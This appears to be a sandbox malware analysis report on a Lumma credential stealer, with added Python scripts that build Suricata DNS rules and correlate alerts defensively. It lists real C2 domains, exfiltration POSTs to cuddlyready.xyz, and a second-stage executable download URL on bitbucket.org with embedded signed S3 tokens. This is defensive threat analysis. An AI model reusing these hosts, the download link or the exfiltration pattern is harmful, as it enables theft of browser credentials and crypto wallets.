Windows Analysis Report
LP4a6BowQN.exe

Overview

General Information

Sample name: LP4a6BowQN.exe (renamed because the original name is a hash value)
Original sample name: 80429ec2b7c1a75bc06b68846eb8be34.exe
Analysis ID: 1579735
MD5: 80429ec2b7c1a75bc06b68846eb8be34
SHA1: b58d0acbef2af53e2d507cfd4fb3c07ea5d6a91e
SHA256: 20255112ad07c22d1d56b35fb01dbf5592bd679dd8903d66bfe871badae4b0f2
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • LP4a6BowQN.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\LP4a6BowQN.exe" MD5: 80429EC2B7C1A75BC06B68846EB8BE34)
    • WerFault.exe (PID: 1412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1948 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Note for this run: "TeslaBrowser/5.5" appears only among the decrypted strings; every captured request in the Networking section carried a Chrome/119 User-Agent, so a detection keyed on the TeslaBrowser string alone would have missed this sample's traffic.
Malware configuration (LummaC, from the configuration extractor):
{"C2 url": ["supporse-comment.cyou", "hosue-billowy.cyou", "cuddlyready.xyz", "sendypaster.xyz", "ripe-blade.cyou", "steppriflej.xyz", "smash-boiling.cyou", "pollution-raker.cyou", "greywe-snotty.cyou"], "Build id": "LOGS11--LiveTraffic"}
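The extracted configuration above is the most reusable artefact in this report: nine C2 domains and a build identifier. The following script is an added example for this page (not Joe Sandbox or Lumma code) that normalises the extractor output, emits one Suricata `dns.query` rule per domain (Suricata 6+ keyword syntax; the `sid` range is a local assumption) and checks a resolver-style DNS log against the list. `DNS_LOG` is constructed sample input; only one of its lines is a configured C2 host, and the look-alike `notcuddlyready.xyz` is there to show why the match must be anchored at a label boundary.

```python
"""Turn the LummaC configuration printed in this report into hunting artefacts.

Added example for this page; it is not Joe Sandbox or Lumma code. CONFIG_JSON
is the configuration the report's extractor produced. DNS_LOG is constructed
sample input (timestamp, client, qtype, qname per line) standing in for a
resolver or Zeek dns.log export; the SID range is a local choice.
"""
import json
import re

CONFIG_JSON = (
    '{"C2 url": ["supporse-comment.cyou", "hosue-billowy.cyou", "cuddlyready.xyz", '
    '"sendypaster.xyz", "ripe-blade.cyou", "steppriflej.xyz", "smash-boiling.cyou", '
    '"pollution-raker.cyou", "greywe-snotty.cyou"], "Build id": "LOGS11--LiveTraffic"}'
)

# Constructed sample log: only the third line is one of the configured C2 hosts.
DNS_LOG = [
    "2024-12-23T07:19:01Z 192.168.2.7 A bitbucket.org",
    "2024-12-23T07:19:02Z 192.168.2.7 A bbuseruploads.s3.amazonaws.com",
    "2024-12-23T07:19:03Z 192.168.2.7 A cuddlyready.xyz",
    "2024-12-23T07:19:04Z 192.168.2.9 A notcuddlyready.xyz",  # look-alike, must not match
]


def parse_config(raw: str) -> dict:
    """Normalise the extractor output: lower-case, bare host names, deduplicated."""
    cfg = json.loads(raw)
    hosts = set()
    for entry in cfg.get("C2 url", []):
        # Some builds list full URLs; strip scheme and path so only the host remains.
        host = re.sub(r"^https?://", "", entry.strip().lower()).split("/")[0]
        if host:
            hosts.add(host)
    return {"domains": sorted(hosts), "build_id": cfg.get("Build id", "")}


def suricata_dns_rules(domains, base_sid=9000001):
    """One dns.query rule per C2 domain. dotprefix + endswith matches the domain and
    any subdomain of it, but not a look-alike such as notcuddlyready.xyz."""
    rules = []
    for i, d in enumerate(sorted(domains)):
        rules.append(
            'alert dns any any -> any any (msg:"LOCAL LummaC C2 DNS lookup {d}"; '
            'dns.query; dotprefix; content:".{d}"; nocase; endswith; '
            'classtype:trojan-activity; sid:{sid}; rev:1;)'.format(d=d, sid=base_sid + i)
        )
    return rules


def _in_scope(qname: str, domain: str) -> bool:
    # Exact match or a subdomain; a label-boundary check, not a substring check.
    return qname == domain or qname.endswith("." + domain)


def match_dns_log(lines, domains):
    """Return (client, qname, matched_domain) for every query that hits the C2 list."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        client, qname = parts[1], parts[-1].rstrip(".").lower()
        for d in domains:
            if _in_scope(qname, d):
                hits.append((client, qname, d))
                break
    return hits


if __name__ == "__main__":
    cfg = parse_config(CONFIG_JSON)
    print("build id:", cfg["build_id"])
    for rule in suricata_dns_rules(cfg["domains"]):
        print(rule)
    for hit in match_dns_log(DNS_LOG, cfg["domains"]):
        print("DNS hit:", hit)
```

Only `cuddlyready.xyz` was actually resolved during this run (see the DNS query line in the Networking section); the other eight domains are still worth blocking and retro-hunting, since Lumma samples rotate through the list when the first host does not answer.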
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1479177875.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: LP4a6BowQN.exe PID: 7624 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: LP4a6BowQN.exe PID: 7624 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: LP4a6BowQN.exe PID: 7624 | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
(2 further entries not shown)
No Sigma rule has matched

Suricata IDS alerts (source 192.168.2.7, destination port 443/TCP throughout), in time order:
Timestamp | SID | Severity | Classtype | Source port | Destination IP
2024-12-23T08:19:03.502498+0100 | 2028371 | 3 | Unknown Traffic | 49700 | 104.21.32.96
2024-12-23T08:19:04.247996+0100 | 2054653 | 1 | A Network Trojan was detected | 49700 | 104.21.32.96
2024-12-23T08:19:04.247996+0100 | 2049836 | 1 | A Network Trojan was detected | 49700 | 104.21.32.96
2024-12-23T08:19:05.590428+0100 | 2028371 | 3 | Unknown Traffic | 49701 | 104.21.32.96
2024-12-23T08:19:11.524442+0100 | 2054653 | 1 | A Network Trojan was detected | 49701 | 104.21.32.96
2024-12-23T08:19:11.524442+0100 | 2049812 | 1 | A Network Trojan was detected | 49701 | 104.21.32.96
2024-12-23T08:19:13.114569+0100 | 2028371 | 3 | Unknown Traffic | 49713 | 104.21.32.96
2024-12-23T08:19:15.782207+0100 | 2028371 | 3 | Unknown Traffic | 49719 | 104.21.32.96
2024-12-23T08:19:18.282621+0100 | 2028371 | 3 | Unknown Traffic | 49725 | 104.21.32.96
2024-12-23T08:19:20.990517+0100 | 2028371 | 3 | Unknown Traffic | 49735 | 104.21.32.96
2024-12-23T08:19:21.966381+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 49735 | 104.21.32.96
2024-12-23T08:19:23.714226+0100 | 2028371 | 3 | Unknown Traffic | 49747 | 104.21.32.96
2024-12-23T08:19:23.841820+0100 | 2843864 | 1 | A Network Trojan was detected | 49747 | 104.21.32.96
2024-12-23T08:19:29.751080+0100 | 2028371 | 3 | Unknown Traffic | 49758 | 104.21.32.96
2024-12-23T08:19:30.519681+0100 | 2054653 | 1 | A Network Trojan was detected | 49758 | 104.21.32.96
2024-12-23T08:19:32.053151+0100 | 2028371 | 3 | Unknown Traffic | 49764 | 185.166.143.49
2024-12-23T08:19:34.464774+0100 | 2028371 | 3 | Unknown Traffic | 49775 | 16.182.101.249
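Read per flow rather than per rule, the alert table tells a clearer story: the JA3 rule (2028371) fires on every TLS connection the process makes, including the two later flows to 185.166.143.49 and 16.182.101.249 that carry no Lumma-specific alert, so it characterises the client's TLS stack rather than the C2. The severity-1 rules cluster on five flows to 104.21.32.96. The script below is an added example for this page (not Joe Sandbox output) that groups the alerts by (source port, destination) and assigns each flow a verdict and a stage label; `ALERTS` is the table above transcribed, and the stage mapping is the author's own reading of the rule names.

```python
"""Correlate the Suricata alerts from this report per TLS flow.

Added example for this page, not Joe Sandbox output. ALERTS is transcribed from
the alert table (every flow is 192.168.2.7 -> <dst>:443/TCP, so only the fields
that vary are kept); SID_NAMES repeats the rule names the Networking section
lists; STAGE is the author's interpretation of those names.
"""
from collections import defaultdict

# (timestamp, sid, severity, source port, destination ip)
ALERTS = [
    ("08:19:03.502498", 2028371, 3, 49700, "104.21.32.96"),
    ("08:19:04.247996", 2054653, 1, 49700, "104.21.32.96"),
    ("08:19:04.247996", 2049836, 1, 49700, "104.21.32.96"),
    ("08:19:05.590428", 2028371, 3, 49701, "104.21.32.96"),
    ("08:19:11.524442", 2054653, 1, 49701, "104.21.32.96"),
    ("08:19:11.524442", 2049812, 1, 49701, "104.21.32.96"),
    ("08:19:13.114569", 2028371, 3, 49713, "104.21.32.96"),
    ("08:19:15.782207", 2028371, 3, 49719, "104.21.32.96"),
    ("08:19:18.282621", 2028371, 3, 49725, "104.21.32.96"),
    ("08:19:20.990517", 2028371, 3, 49735, "104.21.32.96"),
    ("08:19:21.966381", 2048094, 1, 49735, "104.21.32.96"),
    ("08:19:23.714226", 2028371, 3, 49747, "104.21.32.96"),
    ("08:19:23.841820", 2843864, 1, 49747, "104.21.32.96"),
    ("08:19:29.751080", 2028371, 3, 49758, "104.21.32.96"),
    ("08:19:30.519681", 2054653, 1, 49758, "104.21.32.96"),
    ("08:19:32.053151", 2028371, 3, 49764, "185.166.143.49"),
    ("08:19:34.464774", 2028371, 3, 49775, "16.182.101.249"),
]

SID_NAMES = {
    2028371: "ET JA3 Hash - Possible Malware - Fake Firefox Font Update",
    2054653: "ET MALWARE Lumma Stealer CnC Host Checkin",
    2049836: "ET MALWARE Lumma Stealer Related Activity",
    2049812: "ET MALWARE Lumma Stealer Related Activity M2",
    2048094: "ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration",
    2843864: "ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2",
}

# Author's reading of the rule names; the JA3 hash is a client property, not a stage.
STAGE = {
    2028371: "tls-fingerprint",
    2054653: "checkin", 2049836: "checkin", 2049812: "checkin",
    2048094: "exfil", 2843864: "exfil",
}


def group_by_flow(alerts):
    """Map (source port, destination ip) -> [(ts, sid, severity)] in time order."""
    flows = defaultdict(list)
    for ts, sid, sev, sport, dst in alerts:
        flows[(sport, dst)].append((ts, sid, sev))
    return {k: sorted(v) for k, v in flows.items()}


def triage(alerts):
    """One row per flow: SIDs in time order, worst severity, stages, verdict.
    Suricata severity 1 is the most severe; a flow with any severity-1 alert is
    treated as confirmed C2, a flow with only the JA3 rule as weak evidence."""
    rows = []
    for (sport, dst), events in sorted(group_by_flow(alerts).items()):
        sids = [sid for _, sid, _ in events]
        stages = []
        for sid in sids:
            s = STAGE.get(sid, "unknown")
            if s != "tls-fingerprint" and s not in stages:
                stages.append(s)
        worst = min(sev for _, _, sev in events)
        verdict = "c2" if worst == 1 else "ja3-only"
        rows.append({"sport": sport, "dst": dst, "sids": sids,
                     "stages": stages, "worst": worst, "verdict": verdict})
    return rows


def c2_destinations(alerts):
    """Destinations that earned at least one severity-1 alert."""
    return sorted({r["dst"] for r in triage(alerts) if r["verdict"] == "c2"})


if __name__ == "__main__":
    for r in triage(ALERTS):
        names = ", ".join(SID_NAMES.get(s, str(s)) for s in r["sids"])
        print(f"{r['sport']:>5} -> {r['dst']:<15} {r['verdict']:<8} {r['stages']} | {names}")
    print("C2 destinations:", c2_destinations(ALERTS))
```

The output leaves one C2 destination (104.21.32.96) and a check-in, exfiltration, check-in sequence on ports 49700/49701, 49735/49747 and 49758; those are the flows worth extracting from the pcap first. Three flows to the C2 (49713, 49719, 49725) and both later flows carry nothing but the JA3 hit, which is the reason the same JA3 value should not be promoted to a blocking indicator on its own.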

                AV Detection

Source: LP4a6BowQN.exe | Avira: detected
Source: LP4a6BowQN.exe.7624.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["supporse-comment.cyou", "hosue-billowy.cyou", "cuddlyready.xyz", "sendypaster.xyz", "ripe-blade.cyou", "steppriflej.xyz", "smash-boiling.cyou", "pollution-raker.cyou", "greywe-snotty.cyou"], "Build id": "LOGS11--LiveTraffic"}
Source: LP4a6BowQN.exe | ReversingLabs: Detection: 57%
Source: LP4a6BowQN.exe | Virustotal: Detection: 58%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: LP4a6BowQN.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmp | String decryptor:
    pollution-raker.cyou
    hosue-billowy.cyou
    ripe-blade.cyou
    smash-boiling.cyou
    supporse-comment.cyou
    greywe-snotty.cyou
    steppriflej.xyz
    sendypaster.xyz
    cuddlyready.xyz
    lid=%s&j=%s&ver=4.0
    TeslaBrowser/5.5
    - Screen Resoluton:
    - Physical Installed Memory:
    Workgroup: -
    LOGS11--LiveTraffic
Source: LP4a6BowQN.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected (version: TLS 1.2):
    104.21.32.96:443 -> 192.168.2.7:49700
    104.21.32.96:443 -> 192.168.2.7:49701
    104.21.32.96:443 -> 192.168.2.7:49713
    104.21.32.96:443 -> 192.168.2.7:49719
    104.21.32.96:443 -> 192.168.2.7:49725
    104.21.32.96:443 -> 192.168.2.7:49735
    104.21.32.96:443 -> 192.168.2.7:49747
    104.21.32.96:443 -> 192.168.2.7:49758
    185.166.143.49:443 -> 192.168.2.7:49764
    16.182.101.249:443 -> 192.168.2.7:49775
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Directory queried: number of queries: 1001

                Networking

Source: Network traffic | Suricata IDS (severity 1):
    2049836 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 104.21.32.96:443
    2054653 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 104.21.32.96:443
    2048094 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49735 -> 104.21.32.96:443
    2049812 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49701 -> 104.21.32.96:443
    2054653 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 104.21.32.96:443
    2054653 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49758 -> 104.21.32.96:443
    2843864 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:49747 -> 104.21.32.96:443
Source: Malware configuration extractor | URLs: supporse-comment.cyou, hosue-billowy.cyou, cuddlyready.xyz, sendypaster.xyz, ripe-blade.cyou, steppriflej.xyz, smash-boiling.cyou, pollution-raker.cyou, greywe-snotty.cyou
Source: DNS query: cuddlyready.xyz
Source: Joe Sandbox View | IP Address: 185.166.143.49
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update, on the flows 192.168.2.7:49700, 49701, 49713, 49719, 49725, 49735, 49747, 49758 -> 104.21.32.96:443; 192.168.2.7:49764 -> 185.166.143.49:443; 192.168.2.7:49775 -> 16.182.101.249:443
Source: global traffic | HTTP traffic detected. Every request below carries "Connection: Keep-Alive" and "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"; the report records headers only, in this order:
    POST /api HTTP/1.1 | Host: cuddlyready.xyz | Content-Type: application/x-www-form-urlencoded | Content-Length: 8
    POST /api HTTP/1.1 | Host: cuddlyready.xyz | Content-Type: application/x-www-form-urlencoded | Content-Length: 53
    POST /api HTTP/1.1 | Host: cuddlyready.xyz | Content-Type: multipart/form-data; boundary=69HI2EZ9KAF5WW7F | Content-Length: 12838
    POST /api HTTP/1.1 | Host: cuddlyready.xyz | Content-Type: multipart/form-data; boundary=1TVB1K1GX36I | Content-Length: 15046
    POST /api HTTP/1.1 | Host: cuddlyready.xyz | Content-Type: multipart/form-data; boundary=9SL1K37UU7GIEZY | Content-Length: 20389
    POST /api HTTP/1.1 | Host: cuddlyready.xyz | Content-Type: multipart/form-data; boundary=6WVH1GHH | Content-Length: 1173
    POST /api HTTP/1.1 | Host: cuddlyready.xyz | Content-Type: multipart/form-data; boundary=FDXL9U82 | Content-Length: 550856
    POST /api HTTP/1.1 | Host: cuddlyready.xyz | Content-Type: application/x-www-form-urlencoded | Content-Length: 88
    GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1 | Host: bitbucket.org
    GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIFBW6TYB&Signature=PelXt66tJz%2FulrB0cB0%2BaL7%2Bi5E%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQD%2BsOmmZbJoeqQMRgcbUIKewsPYW2aBXNNdnqSZnOjDFwIgR8XEHN13jTNswyI0HHU0LSuyGD%2FTMiS45XjOxzfx2bUqsAII0P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDKLERm7AyKJmGnsaryqEAiz2RQWxEcCBLMIfVp3H4PSzeOX5Dz20ShaLz%2BgE9TIlAJRJj3b2E09svKzFkLddqGwYqC2K%2FKIH%2B43EpJ156iF0t0YnErOxg3PyYWT2PSMugnEx4xgVbJpkrwOS%2BaXe%2FSsC4UOf%2F83UoqmwNPRhKyzztbcDpxLcWerZy9Q6aovVLfMedeL2%2BzfXvbpi8S9915xhF0Cpozy3i0jpnDfou%2FWMrbGZX8d8kbOTHT2AOnqFdwajWkRe0yZY7VqHnS4UnUUU2gtvmzbAh%2B9Byjxps3Oa32XIPpDohq%2Fsd63Twd%2FTpUBNqNyZ3%2BxCnHgqoVCvvdq8kFyXYiW9CTBL2KWz0BWyfxXEMIaYpLsGOp0BYb7jWXl2rvZ6kkWiTN4Lg4p1xTsXw8YInPWUnYT2zjLbcrffJNmSPBWt8S40YM7x5zFblDt5Ez56YqzuxoQvJUGtRwLyEvmWXdiFc4qnFdZ23f1PLTAyj9HhgDgDv4DamxGztbRL8AaMRtwH4RffwZACiFAqouZ6XFzfcohb2gfVkHH44WWfa%2BbgFPu5g%2BOCDe%2B7GJ3m%2BCwi76mw1w%3D%3D&Expires=1734939406 HTTP/1.1 | Host: bbuseruploads.s3.amazonaws.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 occurrences)
Source: global traffic | DNS traffic detected: DNS query: cuddlyready.xyz
Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Host: cuddlyready.xyz | Content-Type: application/x-www-form-urlencoded | Content-Length: 8 (same Connection and User-Agent headers as above)
The URLs below are certificate-authority, CRL and OCSP endpoints that the analyser pulled out of process memory; the stray characters after many of them (crt0E, crl0G, rootr30; and so on) are the adjacent DER bytes of the X.509 extensions the URLs sit in, so these are artefacts of the TLS sessions and the signed binaries handled during the run, not attacker infrastructure.
Source: LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662634082.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp | Strings found in binary or memory:
    http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    http://ocsp.digicert.com0A
    http://ocsp.digicert.com0C
    http://ocsp.digicert.com0X
Source: LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory:
    http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
    http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
    http://crl.rootca1.amazontrust.com/rootca1.crl0
    http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
    http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
    http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
    http://crt.rootca1.amazontrust.com/rootca1.cer0?
    http://ocsp.digicert.com0
    http://ocsp.rootca1.amazontrust.com0:
    http://x1.c.lencr.org/0
    http://x1.i.lencr.org/0
Source: LP4a6BowQN.exe, 00000000.00000003.1662983578.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990583895.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp | Strings found in binary or memory:
    http://crl.globalsign.com/codesigningrootr45.crl0U
    http://ocsp.globalsign.com/codesigningrootr450F
    http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: LP4a6BowQN.exe, 00000000.00000003.1662983578.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990583895.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmp | Strings found in binary or memory:
    http://crl.globalsign.com/root-r3.crl0G
    http://ocsp.globalsign.com/rootr30;
    http://secure.globalsign.com/cacert/root-r3.crt06
Source: LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1506334302.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1479177875.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microH
Source: LP4a6BowQN.exe, 00000000.00000002.1994446587.0000000005AF9000.00000002.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662614324.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662371385.0000000005557000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Amcache.hve.6.dr | String found in binary or memory: http://upx.sf.net
Source: LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: LP4a6BowQN.exeString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: LP4a6BowQN.exe, 00000000.00000003.1662634082.0000000000BFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                Source: LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3
                Source: LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: LP4a6BowQN.exe, 00000000.00000002.1984216252.00000000006FA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
